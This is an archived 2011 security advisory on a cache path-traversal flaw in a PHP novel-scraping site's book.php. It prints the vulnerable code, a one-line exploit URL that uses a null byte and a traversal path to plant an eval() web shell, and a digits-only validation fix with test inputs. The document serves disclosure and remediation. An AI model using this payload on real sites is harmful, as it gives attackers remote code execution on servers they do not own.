Mad Pirates novel thief: GETshell vulnerability and fix

2011-11-30T00:00:00
ID MYHACK58:62201132485
Type myhack58
Reporter Anonymous
Modified 2011-11-30T00:00:00

Description

Team: t00ls Author: Cond0r

A rather silly vulnerability.

Caching must be turned on for it to be usable.

First, look at the code:

book.php

$kd_cachedir = "./cache";

if($kd_book_cache=="ture"){//cache must be turned on
    $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
    // echo $lastflesh;
    if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
        ob_start();
        include "./templates/$kd_moban/book.html";
        $mianfei = ob_get_contents();
        ob_end_clean();
        file_put_contents("./cache/book$shuid.html",$mianfei);
        echo file_get_contents($kd_cachedir."/book$shuid.html");
    }else{
        echo file_get_contents("./cache/book$shuid.html");
    }
}else{
    include "./templates/$kd_moban/book.html";
}
?>

exp: http://www.badguest.cn/book.php?id=/../../1.php%00"><?php eval($_POST[a])?>

Fix: filter the book ID ($shuid) before it is used to build the cache file path.
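
One way to implement that filter, as an added example that is not the application's own code: it assumes book IDs are plain decimal numbers, and the helper name cache_path_for_book() and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not the application's code. Assumptions: book IDs are plain
// decimal numbers; cache_path_for_book() is a hypothetical helper name.

/**
 * Return the absolute cache file path for a book ID, or null when the ID
 * fails validation and must not be used in any filesystem call.
 */
function cache_path_for_book(string $cacheDir, $shuid): ?string
{
    // Request parameters can arrive as arrays (id[]=...), so check the type.
    if (!is_string($shuid)) {
        return null;
    }
    // Allow-list: 1 to 10 ASCII digits. \A and \z anchor the whole string,
    // so "/", ".", NUL bytes, quotes and a trailing newline all fail.
    if (preg_match('/\A[0-9]{1,10}\z/', $shuid) !== 1) {
        return null;
    }
    // Resolve the cache directory once so the result does not depend on
    // the current working directory.
    $base = realpath($cacheDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . 'book' . $shuid . '.html';
}

// Constructed sample inputs: one normal ID and several hostile shapes.
$cacheDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'kd_cache_demo';
if (!is_dir($cacheDir)) {
    mkdir($cacheDir, 0700, true);
}
$samples = ['1024', '/../../1.php', "7\0.php", '12"><b>', ['1'], "5\n"];
foreach ($samples as $id) {
    $path = cache_path_for_book($cacheDir, $id);
    printf("%-18s => %s\n", json_encode($id, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected' : 'accepted: ' . basename($path));
}
```

In book.php the caller would stop with an error when the helper returns null, before either file_put_contents() or file_get_contents() runs.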